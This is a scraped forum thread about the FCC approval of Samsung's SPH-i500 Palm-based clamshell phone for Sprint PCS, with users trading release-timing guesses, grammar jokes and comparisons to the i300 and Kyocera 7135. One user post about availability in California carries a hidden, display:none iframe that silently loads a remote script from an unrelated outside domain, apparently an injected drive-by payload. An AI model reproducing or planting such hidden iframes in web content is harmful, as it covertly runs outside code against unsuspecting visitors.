+ Reply to Thread

New Color Phone approved today! Samsung SPH-i500 Palm powered phone!

FCC has approved a new color wireless phone today. It is manufactured by Samsung and its model is SPH-i500. It is powered by PALM operating system. It would be sold by Sprint PCS.

more info:
    SPH-i500 specs + pics

Smile That's Cool.

Sorry I'm new to this site.

When will that be for sale in CA? My BF would think I was cool if i got it before him.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Smart Girl's Rock

Usually it takes several months from the date a manufacturer receives a FCC approval to the date the phone is available for sale to the general public. Nobody knows for sure if even the phone would be available for sale. There are instances when a phone is approved by FCC and never gets to the shelf.

Administrator

Arrow

our readers are generally aware of this occurence if they keep up with the posts. we have seen a lot of smartphones come across this board of late. the fcc site is our friend! this phone is similiar to the 7136 in terms of design (just as the 600) but looks unfinished to me...

Re: That's Cool.

Originally posted by SmartGirl

Really smart girls know that plurals don't require apostrophes...
    unless 'Rock' is a nown not a verb & 'Girl's' is a possessive... then she's right on....lol... (good job Pete, that was a wasted post)
    .....beam me up Scotty...

PHO
    Broward County Florida, "Home of the Hanging Chad"
    Originally posted by petewat

unless 'Rock' is a nown not a verb & 'Girl's' is a possessive... then she's right on....lol... (good job Pete, that was a wasted post)

I used Rock as a Nown once. Damn i got funny looks.

Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

Platinum Member

Cough! Cough!... back to the subject...

The sph-i500 is unimpressive from the i300 owner's point of view. It doesn't seem to offer anything new except 3G access and the clamshell design. 3G is not getting rave reviews from the members of our forum. Clamshell design is a matter of preference.

On top of that, it looks like the i500 is going to be the same half-baked not-really-a-palm, yet-not-really-a-phone, non-integrated product with the same kind of (non) support we've all "enjoyed" from Samsung.

I like the size of it. That's about all I like better than my i300. I used to have a StarTac and I really like clamshell phones.

It's not an obvious choice, but I'm still leaning toward the Kyocera 7135, I don't like its size (too big), but Kyocera support for developers and the MP3 player + SD card slot have me salivating.

Adiascar.

nown
    oops....that would be "noun" of course.

Re: Cough! Cough!... back to the subject...

Originally posted by adiascar
    The sph-i500 is unimpressive from the i300 owner's point of view.
    How can you say that? By the size and (possibly) the battery life alone would want me to ditch my I300 and jump ahead for I500. Well, I guess that might be just me, but I need a good phone first (but with Palm).

--------
    i have great faith in fools -- self confidence my friends call it. -- edgar allan poe

Nice quote kboy & welcome

same kind of (non) support we've all "enjoyed" from Samsung
    Adi - I gotta add my 2 cents to that one. I'm sure it's inconsistent (most CS is) but I've had good experiences dealin with Samsung tech support. They were a while ago when the I300 was still all da rage (they were into supporting it) but both were through email and I had helpful responses within 2 hrs both times.
    Back to the ummm real topic here - I'm waitin to see what version of the Bluechip, seen or not, that surfaces (assuming of course that we aren't already lookin at it, lol).

smartphonecentral.com
    I think 'support' might have meant support for developers in the form of an SDK or other tools to help build apps for the phone, rather than end user technical support.
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

Samsung support has been pretty gtood to me too.... then again, I think any tech support is better that what my ISP gives me!